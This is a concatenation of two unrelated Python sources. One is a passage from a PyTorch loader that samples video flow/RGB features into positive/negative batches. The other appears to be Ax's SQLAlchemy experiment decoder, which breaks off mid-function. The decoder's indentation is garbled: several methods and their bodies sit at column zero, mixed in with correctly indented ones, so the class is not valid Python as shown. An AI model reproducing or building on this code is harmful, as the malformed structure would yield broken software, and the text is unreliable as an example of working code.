        """Map each class index -> (positive video indices, negative video indices)."""
        label_index_dict_pos = collections.defaultdict(list)
        label_index_dict = dict()
        for idx in range(len(self.video_labels)):
            label = self.video_labels[idx]
            cls_inds = np.where(label == 1)[0]
            for j in range(len(cls_inds)):
                label_index_dict_pos[cls_inds[j]].append(idx)
        for j in range(self._num_classes):
            pos_label_inds = label_index_dict_pos[j]
            neg_label_inds = [x for x in range(len(self.video_labels)) if
                              x not in pos_label_inds]
            label_index_dict[j] = tuple([pos_label_inds, neg_label_inds])
        return label_index_dict

    def read_all_features(self):
        """Preload every video's flow/rgb feature arrays into two lists."""
        flow_features_all = []
        rgb_features_all = []
        for filename in self._file_names:
            flow_file = osp.join(self._ucf_dir, filename, 'features_flow.npy')
            rgb_file = osp.join(self._ucf_dir, filename, 'features_rgb.npy')
            # BUGFIX: np.load() must receive a path or a *binary* file object;
            # the previous open(file, 'r') text handle fails under Python 3.
            flow_features = np.load(flow_file)
            rgb_features = np.load(rgb_file)
            flow_features_all.append(flow_features)
            rgb_features_all.append(rgb_features)
        return flow_features_all, rgb_features_all

    def _sample_rows(self, features, count):
        """Sample *count* rows from *features*: without replacement when there
        are enough rows, with replacement otherwise."""
        if len(features) > count:
            rows = np.random.choice(len(features), count, replace=False)
        else:
            rows = np.random.choice(len(features), count)
        return features[rows, :]

    def forward_video(self, index):
        """Build one shuffled positive/negative frame batch for a random class."""
        # BUGFIX: removed the leftover debugging override (`cls_index = 0`,
        # together with the commented-out np.random.seed(0)/index = 0 lines)
        # that forced every batch to class 0; the class is now drawn at random
        # as intended.
        cls_index = np.random.choice(self._num_classes, 1)[0]
        pos_vid_inds, neg_vid_inds = self.label_index_dict[cls_index]
        # choose videos with replacement
        sample_pos_inds = np.random.choice(pos_vid_inds, 8)
        sample_neg_inds = np.random.choice(neg_vid_inds, 12)
        # positives: frame features from videos of the drawn class
        pos_features_flow = np.vstack(
            [self.flow_features_all[i] for i in sample_pos_inds])
        flow_input_pos = self._sample_rows(pos_features_flow, self._num_same)
        del pos_features_flow  # free the stacked copy
        pos_features_rgb = np.vstack(
            [self.rgb_features_all[i] for i in sample_pos_inds])
        rgb_input_pos = self._sample_rows(pos_features_rgb, self._num_same)
        del pos_features_rgb
        # negatives: frame features from videos of other classes
        neg_features_flow = np.vstack(
            [self.flow_features_all[i] for i in sample_neg_inds])
        flow_input_neg = self._sample_rows(neg_features_flow, self._num_diff)
        del neg_features_flow
        neg_features_rgb = np.vstack(
            [self.rgb_features_all[i] for i in sample_neg_inds])
        rgb_input_neg = self._sample_rows(neg_features_rgb, self._num_diff)
        del neg_features_rgb
        labels_pos = np.ones([len(flow_input_pos), 1])
        labels_neg = np.zeros([len(flow_input_neg), 1])
        labels = np.reshape(np.vstack([labels_pos, labels_neg]), -1)
        labels = np.expand_dims(np.array(labels), axis=0)
        # per-example loss weights from the positive/negative class weights
        weights = labels * self.weight_pos + (1 - labels) * self.weight_neg
        flow_features_input = np.vstack([flow_input_pos, flow_input_neg])
        rgb_features_input = np.vstack([rgb_input_pos, rgb_input_neg])
        # shuffle positives and negatives together, keeping rows aligned
        indices = [x for x in range(len(rgb_features_input))]
        np.random.shuffle(indices)
        flow_features_input = Variable(
            torch.from_numpy(flow_features_input[indices]).cuda())
        rgb_features_input = Variable(
            torch.from_numpy(rgb_features_input[indices]).cuda())
        labels = Variable(torch.from_numpy(labels[0, indices]).float().cuda())
        weights = Variable(torch.from_numpy(weights[0, indices]).float().cuda())
        cls_index = np.expand_dims(np.array(cls_index), axis=0)
        cls_index = Variable(torch.from_numpy(cls_index))
        return cls_index, labels, weights, flow_features_input, rgb_features_input
def split(data_dir):
    """Return the names of all directory entries inside *data_dir* as a list."""
    return [entry for entry in os.listdir(data_dir)]
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from collections import OrderedDict, defaultdict
from enum import Enum
from typing import List, Optional, Tuple, Type, Union
import pandas as pd
from ax.core.abstract_data import AbstractDataFrameData
from ax.core.arm import Arm
from ax.core.base_trial import BaseTrial, TrialStatus
from ax.core.batch_trial import AbandonedArm, BatchTrial, GeneratorRunStruct
from ax.core.data import Data
from ax.core.experiment import Experiment
from ax.core.generator_run import GeneratorRun, GeneratorRunType
from ax.core.metric import Metric
from ax.core.multi_type_experiment import MultiTypeExperiment
from ax.core.objective import MultiObjective, Objective, ScalarizedObjective
from ax.core.optimization_config import (
MultiObjectiveOptimizationConfig,
OptimizationConfig,
)
from ax.core.outcome_constraint import (
ObjectiveThreshold,
OutcomeConstraint,
ScalarizedOutcomeConstraint,
)
from ax.core.parameter import ChoiceParameter, FixedParameter, Parameter, RangeParameter
from ax.core.parameter_constraint import (
OrderConstraint,
ParameterConstraint,
SumConstraint,
)
from ax.core.runner import Runner
from ax.core.search_space import SearchSpace
from ax.core.simple_experiment import SimpleExperiment
from ax.core.trial import Trial
from ax.exceptions.storage import SQADecodeError
from ax.modelbridge.generation_strategy import GenerationStrategy
from ax.modelbridge.registry import Models, ModelRegistryBase
from ax.storage.json_store.decoder import object_from_json
from ax.storage.metric_registry import REVERSE_METRIC_REGISTRY
from ax.storage.runner_registry import REVERSE_RUNNER_REGISTRY
from ax.storage.sqa_store.sqa_classes import (
SQAAbandonedArm,
SQAArm,
SQAData,
SQAExperiment,
SQAGenerationStrategy,
SQAGeneratorRun,
SQAMetric,
SQAParameter,
SQAParameterConstraint,
SQARunner,
SQATrial,
)
from ax.storage.sqa_store.sqa_config import SQAConfig
from ax.storage.utils import DomainType, MetricIntent, ParameterConstraintType
from ax.utils.common.constants import Keys
from ax.utils.common.typeutils import not_none
class Decoder:
"""Class that contains methods for loading an Ax experiment from SQLAlchemy.
Instantiate with an instance of Config to customize the functionality.
For even more flexibility, create a subclass.
Attributes:
config: Metadata needed to save and load an experiment to SQLAlchemy.
"""
def __init__(self, config: SQAConfig) -> None:
    """Store the SQA storage *config* consulted by all decode methods."""
    self.config = config
def get_enum_name(
    self, value: Optional[int], enum: Optional[Type[Enum]]
) -> Optional[str]:
    """Given an enum value (int) and an enum class (of ints), return the
    corresponding enum member name. If the value is not present in the enum,
    throw an error.

    Args:
        value: the stored integer value, or None.
        enum: the enum class to look the value up in, or None.
            (The annotation previously said ``Enum`` — an instance — but the
            code calls ``enum(value)``, which requires the class.)

    Returns:
        The member name, or None when either argument is None.

    Raises:
        SQADecodeError: if ``value`` is not a member of ``enum``.
    """
    if value is None or enum is None:
        return None
    try:
        return enum(value).name  # pyre-ignore T29651755
    except ValueError as err:
        # chain the original ValueError for easier debugging
        raise SQADecodeError(f"Value {value} is invalid for enum {enum}.") from err
    def _init_experiment_from_sqa(self, experiment_sqa: SQAExperiment) -> Experiment:
        """First step of conversion within experiment_from_sqa.

        Decodes experiment-level fields (metrics, search space, status quo,
        runner, properties) and instantiates either a `SimpleExperiment` or a
        plain `Experiment`; trials and data are attached later by the caller.
        """
        opt_config, tracking_metrics = self.opt_config_and_tracking_metrics_from_sqa(
            metrics_sqa=experiment_sqa.metrics
        )
        search_space = self.search_space_from_sqa(
            parameters_sqa=experiment_sqa.parameters,
            parameter_constraints_sqa=experiment_sqa.parameter_constraints,
        )
        if search_space is None:
            raise SQADecodeError(  # pragma: no cover
                "Experiment SearchSpace cannot be None."
            )
        # A stored status quo is represented by its parameterization plus an
        # optional name; absence of parameters means no status quo was saved.
        status_quo = (
            Arm(
                # pyre-fixme[6]: Expected `Dict[str, Optional[Union[bool, float,
                # int, str]]]` for 1st param but got `Optional[Dict[str,
                # Optional[Union[bool, float, int, str]]]]`.
                parameters=experiment_sqa.status_quo_parameters,
                name=experiment_sqa.status_quo_name,
            )
            if experiment_sqa.status_quo_parameters is not None
            else None
        )
        # Single-type experiments carry at most one runner; more than one is
        # only meaningful for MultiTypeExperiment (handled elsewhere).
        if len(experiment_sqa.runners) == 0:
            runner = None
        elif len(experiment_sqa.runners) == 1:
            runner = self.runner_from_sqa(experiment_sqa.runners[0])
        else:
            raise ValueError(  # pragma: no cover
                "Multiple runners on experiment "
                "only supported for MultiTypeExperiment."
            )
        # `experiment_sqa.properties` is `sqlalchemy.ext.mutable.MutableDict`
        # so need to convert it to regular dict.
        properties = dict(experiment_sqa.properties or {})
        # Remove 'subclass' from experiment's properties, since its only
        # used for decoding to the correct experiment subclass in storage.
        subclass = properties.pop(Keys.SUBCLASS, None)
        default_data_type = experiment_sqa.default_data_type
        if subclass == "SimpleExperiment":
            if opt_config is None:
                raise SQADecodeError(  # pragma: no cover
                    "SimpleExperiment must have an optimization config."
                )
            experiment = SimpleExperiment(
                name=experiment_sqa.name,
                search_space=search_space,
                objective_name=opt_config.objective.metric.name,
                minimize=opt_config.objective.minimize,
                outcome_constraints=opt_config.outcome_constraints,
                status_quo=status_quo,
                properties=properties,
                default_data_type=default_data_type,
            )
            # SimpleExperiment's constructor does not accept these fields,
            # so they are set after construction.
            experiment.description = experiment_sqa.description
            experiment.is_test = experiment_sqa.is_test
        else:
            experiment = Experiment(
                name=experiment_sqa.name,
                description=experiment_sqa.description,
                search_space=search_space,
                optimization_config=opt_config,
                tracking_metrics=tracking_metrics,
                runner=runner,
                status_quo=status_quo,
                is_test=experiment_sqa.is_test,
                properties=properties,
                default_data_type=default_data_type,
            )
        return experiment
    def _init_mt_experiment_from_sqa(
        self, experiment_sqa: SQAExperiment
    ) -> MultiTypeExperiment:
        """First step of conversion within experiment_from_sqa.

        Multi-type variant: decodes per-trial-type runners and re-attaches
        tracking metrics with their trial type and canonical name.
        """
        opt_config, tracking_metrics = self.opt_config_and_tracking_metrics_from_sqa(
            metrics_sqa=experiment_sqa.metrics
        )
        search_space = self.search_space_from_sqa(
            parameters_sqa=experiment_sqa.parameters,
            parameter_constraints_sqa=experiment_sqa.parameter_constraints,
        )
        if search_space is None:
            raise SQADecodeError(  # pragma: no cover
                "Experiment SearchSpace cannot be None."
            )
        status_quo = (
            Arm(
                # pyre-fixme[6]: Expected `Dict[str, Optional[Union[bool, float,
                # int, str]]]` for 1st param but got `Optional[Dict[str,
                # Optional[Union[bool, float, int, str]]]]`.
                parameters=experiment_sqa.status_quo_parameters,
                name=experiment_sqa.status_quo_name,
            )
            if experiment_sqa.status_quo_parameters is not None
            else None
        )
        # Each stored runner is keyed by the trial type it serves.
        trial_type_to_runner = {
            not_none(sqa_runner.trial_type): self.runner_from_sqa(sqa_runner)
            for sqa_runner in experiment_sqa.runners
        }
        default_trial_type = not_none(experiment_sqa.default_trial_type)
        # Convert MutableDict to a plain dict before mutating it.
        properties = dict(experiment_sqa.properties or {})
        if properties:
            # Remove 'subclass' from experiment's properties, since its only
            # used for decoding to the correct experiment subclass in storage.
            properties.pop(Keys.SUBCLASS, None)
        default_data_type = experiment_sqa.default_data_type
        experiment = MultiTypeExperiment(
            name=experiment_sqa.name,
            description=experiment_sqa.description,
            search_space=search_space,
            default_trial_type=default_trial_type,
            default_runner=trial_type_to_runner[default_trial_type],
            optimization_config=opt_config,
            status_quo=status_quo,
            properties=properties,
            default_data_type=default_data_type,
        )
        experiment._trial_type_to_runner = trial_type_to_runner
        # Tracking metrics must be re-added through the MultiTypeExperiment
        # API so each carries its trial type and canonical name; look the
        # originals up by name to recover those fields.
        sqa_metric_dict = {metric.name: metric for metric in experiment_sqa.metrics}
        for tracking_metric in tracking_metrics:
            sqa_metric = sqa_metric_dict[tracking_metric.name]
            experiment.add_tracking_metric(
                tracking_metric,
                trial_type=not_none(sqa_metric.trial_type),
                canonical_name=sqa_metric.canonical_name,
            )
        return experiment
    def experiment_from_sqa(
        self, experiment_sqa: SQAExperiment, reduced_state: bool = False
    ) -> Experiment:
        """Convert SQLAlchemy Experiment to Ax Experiment.

        Args:
            experiment_sqa: `SQAExperiment` to decode.
            reduced_state: Whether to load experiment with a slightly reduced state
                (without abandoned arms on experiment and without model state,
                search space, and optimization config on generator runs).
        """
        # Dispatch on the 'subclass' property to pick the right first-step
        # initializer; the property itself is stripped inside those helpers.
        subclass = (experiment_sqa.properties or {}).get(Keys.SUBCLASS)
        if subclass == "MultiTypeExperiment":
            experiment = self._init_mt_experiment_from_sqa(experiment_sqa)
        else:
            experiment = self._init_experiment_from_sqa(experiment_sqa)
        trials = [
            self.trial_from_sqa(
                trial_sqa=trial, experiment=experiment, reduced_state=reduced_state
            )
            for trial in experiment_sqa.trials
        ]
        # Group decoded data as {trial_index: {timestamp: data}}.
        data_by_trial = defaultdict(dict)
        for data_sqa in experiment_sqa.data:
            trial_index = data_sqa.trial_index
            timestamp = data_sqa.time_created
            # TODO: Use metrics-like Data type field in Data instead.
            default_data_constructor = experiment.default_data_constructor
            data_by_trial[trial_index][timestamp] = self.data_from_sqa(
                data_sqa=data_sqa, data_constructor=default_data_constructor
            )
        # Order each trial's data chronologically by creation timestamp.
        data_by_trial = {
            trial_index: OrderedDict(sorted(data_by_timestamp.items()))
            for trial_index, data_by_timestamp in data_by_trial.items()
        }
        # Attach decoded trials and rebuild the arm registry from scratch.
        experiment._trials = {trial.index: trial for trial in trials}
        experiment._arms_by_name = {}
        for trial in trials:
            if trial.ttl_seconds is not None:
                experiment._trials_have_ttl = True
            for arm in trial.arms:
                experiment._register_arm(arm)
        if experiment.status_quo is not None:
            sq = not_none(experiment.status_quo)
            experiment._register_arm(sq)
        experiment._time_created = experiment_sqa.time_created
        experiment._experiment_type = self.get_enum_name(
            value=experiment_sqa.experiment_type, enum=self.config.experiment_type_enum
        )
        experiment._data_by_trial = dict(data_by_trial)
        experiment.db_id = experiment_sqa.id
        return experiment
def parameter_from_sqa(self, parameter_sqa: SQAParameter) -> Parameter:
"""Convert SQLAlchemy Parameter to Ax Parameter."""
if parameter_sqa.domain_type == DomainType.RANGE:
if parameter_sqa.lower is None or parameter_sqa.upper is None:
raise SQADecodeError( # pragma: no cover
"`lower` and `upper` must be set for RangeParameter."
)
parameter = RangeParameter(
name=parameter_sqa.name,
parameter_type=parameter_sqa.parameter_type,
# pyre-fixme[6]: Expected `float` for 3rd param but got
# `Optional[float]`.
lower=parameter_sqa.lower,
upper=parameter_sqa.upper,
log_scale=parameter_sqa.log_scale or False,
digits=parameter_sqa.digits,
is_fidelity=parameter_sqa.is_fidelity or False,
target_value=parameter_sqa.target_value,
)
elif parameter_sqa.domain_type == DomainType.CHOICE:
if parameter_sqa.choice_values is None:
raise SQADecodeError( # pragma: no cover
"`values` must be set for ChoiceParameter."
)
parameter = ChoiceParameter(
name=parameter_sqa.name,
parameter_type=parameter_sqa.parameter_type,
# pyre-fixme[6]: Expected `List[Optional[Union[bool, float, int,
# str]]]` for 3rd param but got `Optional[List[Optional[Union[bool,
# float, int, str]]]]`.
values=parameter_sqa.choice_values,
is_fidelity=parameter_sqa.is_fidelity or False,
target_value=parameter_sqa.target_value,
)
elif parameter_sqa.domain_type == DomainType.FIXED:
# Don't throw an error if parameter_sqa.fixed_value is None;
# that might be the actual value!
parameter = FixedParameter(
name=parameter_sqa.name,
parameter_type=parameter_sqa.parameter_type,
value=parameter_sqa.fixed_value,
is_fidelity=parameter_sqa.is_fidelity or False,
target_value=parameter_sqa.target_value,
)
else:
raise SQADecodeError(
f"Cannot decode SQAParameter because {parameter_sqa.domain_type} "
"is an invalid domain type."
)
parameter.db_id = parameter_sqa.id
return parameter
def parameter_constraint_from_sqa(
self,
parameter_constraint_sqa: SQAParameterConstraint,
parameters: List[Parameter],
) -> ParameterConstraint:
"""Convert SQLAlchemy ParameterConstraint to Ax ParameterConstraint."""
parameter_map = {p.name: p for p in parameters}
if parameter_constraint_sqa.type == ParameterConstraintType.ORDER:
lower_name = None
upper_name = None
for k, v in parameter_constraint_sqa.constraint_dict.items():
if v == 1:
lower_name = k
elif v == -1:
upper_name = k
if not lower_name or not upper_name:
raise SQADecodeError(
"Cannot decode SQAParameterConstraint because `lower_name` or "
"`upper_name` was not found."
)
# pyre-fixme[6]: Expected `str` for 1st param but got `None`.
lower_parameter = parameter_map[lower_name]
# pyre-fixme[6]: Expected `str` for 1st param but got `None`.
upper_parameter = parameter_map[upper_name]
constraint = OrderConstraint(
lower_parameter=lower_parameter, upper_parameter=upper_parameter
)
elif parameter_constraint_sqa.type == ParameterConstraintType.SUM:
# This operation is potentially very inefficient.
# It is O(#constrained_parameters * #total_parameters)
parameter_names = list(parameter_constraint_sqa.constraint_dict.keys())
constraint_parameters = [
next(
search_space_param
for search_space_param in parameters
if search_space_param.name == c_p_name
)
for c_p_name in parameter_names
]
a_values = list(parameter_constraint_sqa.constraint_dict.values())
if len(a_values) == 0:
raise SQADecodeError(
"Cannot decode SQAParameterConstraint because `constraint_dict` "
"is empty."
)
a = a_values[0]
is_upper_bound = a == 1
bound = parameter_constraint_sqa.bound * a
constraint = SumConstraint(
parameters=constraint_parameters,
is_upper_bound=is_upper_bound,
bound=bound,
)
else:
constraint = ParameterConstraint(
constraint_dict=dict(parameter_constraint_sqa.constraint_dict),
bound=parameter_constraint_sqa.bound,
)
constraint.db_id = parameter_constraint_sqa.id
return constraint
def search_space_from_sqa(
self,
parameters_sqa: List[SQAParameter],
parameter_constraints_sqa: List[SQAParameterConstraint],
) -> Optional[SearchSpace]:
"""Convert a list of SQLAlchemy Parameters and ParameterConstraints to an
Ax SearchSpace.
"""
parameters = [
self.parameter_from_sqa(parameter_sqa=parameter_sqa)
for parameter_sqa in parameters_sqa
]
parameter_constraints = [
self.parameter_constraint_from_sqa(
parameter_constraint_sqa=parameter_constraint_sqa, parameters=parameters
)
for parameter_constraint_sqa in parameter_constraints_sqa
]
if len(parameters) == 0:
return None
return SearchSpace(
parameters=parameters, parameter_constraints=parameter_constraints
)
def metric_from_sqa_util(self, metric_sqa: SQAMetric) -> Metric:
"""Convert SQLAlchemy Metric to Ax Metric"""
metric_class = REVERSE_METRIC_REGISTRY.get(metric_sqa.metric_type)
if metric_class is None:
raise SQADecodeError(
f"Cannot decode SQAMetric because {metric_sqa.metric_type} "
f"is an invalid type."
)
args = dict(metric_sqa.properties or {})
args["name"] = metric_sqa.name
args["lower_is_better"] = metric_sqa.lower_is_better
args = metric_class.deserialize_init_args(args=args)
metric = metric_class(**args)
metric.db_id = metric_sqa.id
return metric
    def metric_from_sqa(
        self, metric_sqa: SQAMetric
    ) -> Union[Metric, Objective, OutcomeConstraint]:
        """Convert SQLAlchemy Metric to Ax Metric, Objective, or OutcomeConstraint.

        The row's `intent` column selects the returned type. Scalarized and
        multi-objective rows are stored as a parent row whose child rows
        carry the individual metrics (and, for scalarized intents, weights).
        """
        metric = self.metric_from_sqa_util(metric_sqa)
        if metric_sqa.intent == MetricIntent.TRACKING:
            return metric
        elif metric_sqa.intent == MetricIntent.OBJECTIVE:
            if metric_sqa.minimize is None:
                raise SQADecodeError(  # pragma: no cover
                    "Cannot decode SQAMetric to Objective because minimize is None."
                )
            if metric_sqa.scalarized_objective_weight is not None:
                raise SQADecodeError(  # pragma: no cover
                    "The metric corresponding to regular objective does not \
                    have weight attribute"
                )
            return Objective(metric=metric, minimize=metric_sqa.minimize)
        elif (
            metric_sqa.intent == MetricIntent.MULTI_OBJECTIVE
        ):  # metric_sqa is a parent whose children are individual
            # metrics in MultiObjective
            if metric_sqa.minimize is None:
                raise SQADecodeError(  # pragma: no cover
                    "Cannot decode SQAMetric to MultiObjective \
                    because minimize is None."
                )
            metrics_sqa_children = metric_sqa.scalarized_objective_children_metrics
            if metrics_sqa_children is None:
                raise SQADecodeError(  # pragma: no cover
                    "Cannot decode SQAMetric to MultiObjective \
                    because the parent metric has no children metrics."
                )
            # Extracting metric and weight for each child
            metrics = [
                self.metric_from_sqa_util(child) for child in metrics_sqa_children
            ]
            multi_objective = MultiObjective(
                metrics=list(metrics),
                # pyre-fixme[6]: Expected `bool` for 2nd param but got `Optional[bool]`.
                minimize=metric_sqa.minimize,
            )
            multi_objective.db_id = metric_sqa.id
            return multi_objective
        elif (
            metric_sqa.intent == MetricIntent.SCALARIZED_OBJECTIVE
        ):  # metric_sqa is a parent whose children are individual
            # metrics in Scalarized Objective
            if metric_sqa.minimize is None:
                raise SQADecodeError(  # pragma: no cover
                    "Cannot decode SQAMetric to Scalarized Objective \
                    because minimize is None."
                )
            metrics_sqa_children = metric_sqa.scalarized_objective_children_metrics
            if metrics_sqa_children is None:
                raise SQADecodeError(  # pragma: no cover
                    "Cannot decode SQAMetric to Scalarized Objective \
                    because the parent metric has no children metrics."
                )
            # Extracting metric and weight for each child
            metrics, weights = zip(
                *[
                    (
                        self.metric_from_sqa_util(child),
                        child.scalarized_objective_weight,
                    )
                    for child in metrics_sqa_children
                ]
            )
            scalarized_objective = ScalarizedObjective(
                metrics=list(metrics),
                weights=list(weights),
                # pyre-fixme[6]: Expected `bool` for 3nd param but got `Optional[bool]`.
                minimize=metric_sqa.minimize,
            )
            scalarized_objective.db_id = metric_sqa.id
            return scalarized_objective
        elif metric_sqa.intent == MetricIntent.OUTCOME_CONSTRAINT:
            if (
                metric_sqa.bound is None
                or metric_sqa.op is None
                or metric_sqa.relative is None
            ):
                raise SQADecodeError(  # pragma: no cover
                    "Cannot decode SQAMetric to OutcomeConstraint because "
                    "bound, op, or relative is None."
                )
            return OutcomeConstraint(
                metric=metric,
                # pyre-fixme[6]: Expected `float` for 2nd param but got
                # `Optional[float]`.
                bound=metric_sqa.bound,
                op=metric_sqa.op,
                relative=metric_sqa.relative,
            )
        elif metric_sqa.intent == MetricIntent.SCALARIZED_OUTCOME_CONSTRAINT:
            if (
                metric_sqa.bound is None
                or metric_sqa.op is None
                or metric_sqa.relative is None
            ):
                raise SQADecodeError(  # pragma: no cover
                    "Cannot decode SQAMetric to Scalarized OutcomeConstraint because "
                    "bound, op, or relative is None."
                )
            metrics_sqa_children = (
                metric_sqa.scalarized_outcome_constraint_children_metrics
            )
            if metrics_sqa_children is None:
                raise SQADecodeError(  # pragma: no cover
                    "Cannot decode SQAMetric to Scalarized OutcomeConstraint \
                    because the parent metric has no children metrics."
                )
            # Extracting metric and weight for each child
            metrics, weights = zip(
                *[
                    (
                        self.metric_from_sqa_util(child),
                        child.scalarized_outcome_constraint_weight,
                    )
                    for child in metrics_sqa_children
                ]
            )
            scalarized_outcome_constraint = ScalarizedOutcomeConstraint(
                metrics=list(metrics),
                weights=list(weights),
                # pyre-fixme[6]: Expected `float` for 2nd param but got
                # `Optional[float]`.
                bound=metric_sqa.bound,
                op=metric_sqa.op,
                relative=metric_sqa.relative,
            )
            scalarized_outcome_constraint.db_id = metric_sqa.id
            return scalarized_outcome_constraint
        elif metric_sqa.intent == MetricIntent.OBJECTIVE_THRESHOLD:
            # NOTE(review): the error message mentions `op`, but unlike the
            # outcome-constraint branches `op` is NOT checked here — an
            # ObjectiveThreshold with op=None is accepted. Confirm whether
            # that asymmetry is intentional.
            if metric_sqa.bound is None or metric_sqa.relative is None:
                raise SQADecodeError(  # pragma: no cover
                    "Cannot decode SQAMetric to ObjectiveThreshold because "
                    "bound, op, or relative is None."
                )
            return ObjectiveThreshold(
                metric=metric,
                # pyre-fixme[6]: Expected `float` for 2nd param but got
                # `Optional[float]`.
                bound=metric_sqa.bound,
                relative=metric_sqa.relative,
                op=metric_sqa.op,
            )
        else:
            raise SQADecodeError(
                f"Cannot decode SQAMetric because {metric_sqa.intent} "
                f"is an invalid intent."
            )
def opt_config_and_tracking_metrics_from_sqa(
self, metrics_sqa: List[SQAMetric]
) -> Tuple[Optional[OptimizationConfig], List[Metric]]:
"""Convert a list of SQLAlchemy Metrics to a a tuple of Ax OptimizationConfig
and tracking metrics.
"""
objective = None
objective_thresholds = []
outcome_constraints = []
tracking_metrics = []
for metric_sqa in metrics_sqa:
metric = self.metric_from_sqa(metric_sqa=metric_sqa)
if isinstance(metric, Objective):
objective = metric
elif isinstance(metric, ObjectiveThreshold):
objective_thresholds.append(metric)
elif isinstance(metric, OutcomeConstraint):
outcome_constraints.append(metric)
else:
tracking_metrics.append(metric)
if objective is None:
return None, tracking_metrics
if objective_thresholds or type(objective) == MultiObjective:
optimization_config = MultiObjectiveOptimizationConfig(
objective=objective,
outcome_constraints=outcome_constraints,
objective_thresholds=objective_thresholds,
)
else:
optimization_config = OptimizationConfig(
objective=objective, outcome_constraints=outcome_constraints
)
return (optimization_config, tracking_metrics)
def arm_from_sqa(self, arm_sqa: SQAArm) -> Arm:
"""Convert SQLAlchemy Arm to Ax Arm."""
arm = Arm(parameters=arm_sqa.parameters, name=arm_sqa.name)
arm.db_id = arm_sqa.id
return arm
def abandoned_arm_from_sqa(
self, abandoned_arm_sqa: SQAAbandonedArm
) -> AbandonedArm:
"""Convert SQLAlchemy AbandonedArm to Ax AbandonedArm."""
arm = AbandonedArm(
name=abandoned_arm_sqa.name,
reason=abandoned_arm_sqa.abandoned_reason,
time=abandoned_arm_sqa.time_abandoned,
)
arm.db_id = abandoned_arm_sqa.id
return arm
    def generator_run_from_sqa(
        self, generator_run_sqa: SQAGeneratorRun, reduced_state: bool = False
    ) -> GeneratorRun:
        """Convert SQLAlchemy GeneratorRun to Ax GeneratorRun.

        Args:
            generator_run_sqa: `SQAGeneratorRun` to decode.
            reduced_state: Whether to load generator runs with a slightly reduced state
                (without model state, search space, and optimization config).
        """
        arms = []
        weights = []
        opt_config = None
        search_space = None
        # Arms and their sampling weights are stored one row per arm.
        for arm_sqa in generator_run_sqa.arms:
            arms.append(self.arm_from_sqa(arm_sqa=arm_sqa))
            weights.append(arm_sqa.weight)
        # Search space and optimization config are only decoded for
        # full-state loads; in reduced state they stay None.
        if not reduced_state:
            (
                opt_config,
                tracking_metrics,
            ) = self.opt_config_and_tracking_metrics_from_sqa(
                metrics_sqa=generator_run_sqa.metrics
            )
            if len(tracking_metrics) > 0:
                raise SQADecodeError(  # pragma: no cover
                    "GeneratorRun should not have tracking metrics."
                )
            search_space = self.search_space_from_sqa(
                parameters_sqa=generator_run_sqa.parameters,
                parameter_constraints_sqa=generator_run_sqa.parameter_constraints,
            )
        best_arm_predictions = None
        model_predictions = None
        # Best-arm info is only meaningful when both its parameters and its
        # predictions were stored.
        if (
            generator_run_sqa.best_arm_parameters is not None
            and generator_run_sqa.best_arm_predictions is not None
        ):
            best_arm = Arm(
                name=generator_run_sqa.best_arm_name,
                parameters=not_none(generator_run_sqa.best_arm_parameters),
            )
            best_arm_predictions = (
                best_arm,
                tuple(not_none(generator_run_sqa.best_arm_predictions)),
            )
        model_predictions = (
            tuple(not_none(generator_run_sqa.model_predictions))
            if generator_run_sqa.model_predictions is not None
            else None
        )
        generator_run = GeneratorRun(
            arms=arms,
            weights=weights,
            optimization_config=opt_config,
            search_space=search_space,
            fit_time=generator_run_sqa.fit_time,
            gen_time=generator_run_sqa.gen_time,
            best_arm_predictions=best_arm_predictions,  # pyre-ignore[6]
            model_predictions=model_predictions,
            model_key=generator_run_sqa.model_key,
            # In reduced state the JSON-serialized model/bridge state is
            # skipped entirely rather than deserialized.
            model_kwargs=None
            if reduced_state
            else object_from_json(generator_run_sqa.model_kwargs),
            bridge_kwargs=None
            if reduced_state
            else object_from_json(generator_run_sqa.bridge_kwargs),
            gen_metadata=None
            if reduced_state
            else object_from_json(generator_run_sqa.gen_metadata),
            model_state_after_gen=None
            if reduced_state
            else object_from_json(generator_run_sqa.model_state_after_gen),
            generation_step_index=generator_run_sqa.generation_step_index,
            candidate_metadata_by_arm_signature=object_from_json(
                generator_run_sqa.candidate_metadata_by_arm_signature
            ),
        )
        # Restore fields the GeneratorRun constructor does not accept.
        generator_run._time_created = generator_run_sqa.time_created
        generator_run._generator_run_type = self.get_enum_name(
            value=generator_run_sqa.generator_run_type,
            enum=self.config.generator_run_type_enum,
        )
        generator_run._index = generator_run_sqa.index
        generator_run.db_id = generator_run_sqa.id
        return generator_run
    def generation_strategy_from_sqa(
        self,
        gs_sqa: SQAGenerationStrategy,
        experiment: Optional[Experiment] = None,
        reduced_state: bool = False,
    ) -> GenerationStrategy:
        """Convert SQALchemy generation strategy to Ax `GenerationStrategy`.

        Args:
            gs_sqa: `SQAGenerationStrategy` to decode.
            experiment: Required when the strategy has generator runs, so the
                underlying model can be restored against it.
            reduced_state: Whether to load all but the latest generator run
                with reduced state.
        """
        steps = object_from_json(gs_sqa.steps)
        gs = GenerationStrategy(name=gs_sqa.name, steps=steps)
        # Restore the pointer to the step the strategy was on when saved.
        gs._curr = gs._steps[gs_sqa.curr_index]
        if reduced_state and gs_sqa.generator_runs:
            # Only fully load the last of the generator runs, load the rest with
            # reduced state.
            gs._generator_runs = [
                self.generator_run_from_sqa(generator_run_sqa=gr, reduced_state=True)
                for gr in gs_sqa.generator_runs[:-1]
            ]
            gs._generator_runs.append(
                self.generator_run_from_sqa(
                    generator_run_sqa=gs_sqa.generator_runs[-1], reduced_state=False
                )
            )
        else:
            gs._generator_runs = [
                self.generator_run_from_sqa(gr) for gr in gs_sqa.generator_runs
            ]
        if len(gs._generator_runs) > 0:
            # Generation strategy had an initialized model.
            if experiment is None:
                raise SQADecodeError(
                    "Cannot decode a generation strategy with a non-zero number of "
                    "generator runs without an experiment."
                )
            gs._experiment = experiment
            # If model in the current step was not directly from the `Models` enum,
            # pass its type to `restore_model_from_generator_run`, which will then
            # attempt to use this type to recreate the model.
            if type(gs._curr.model) != Models:
                models_enum = type(gs._curr.model)
                assert issubclass(models_enum, ModelRegistryBase)
                # pyre-ignore[6]: `models_enum` typing hackiness
                gs._restore_model_from_generator_run(models_enum=models_enum)
            else:
                gs._restore_model_from_generator_run()
        gs.db_id = gs_sqa.id
        return gs
def runner_from_sqa(self, runner_sqa: SQARunner) -> Runner:
"""Convert SQLAlchemy Runner to Ax Runner."""
runner_class = REVERSE_RUNNER_REGISTRY.get(runner_sqa.runner_type)
if runner_class is None:
raise SQADecodeError(
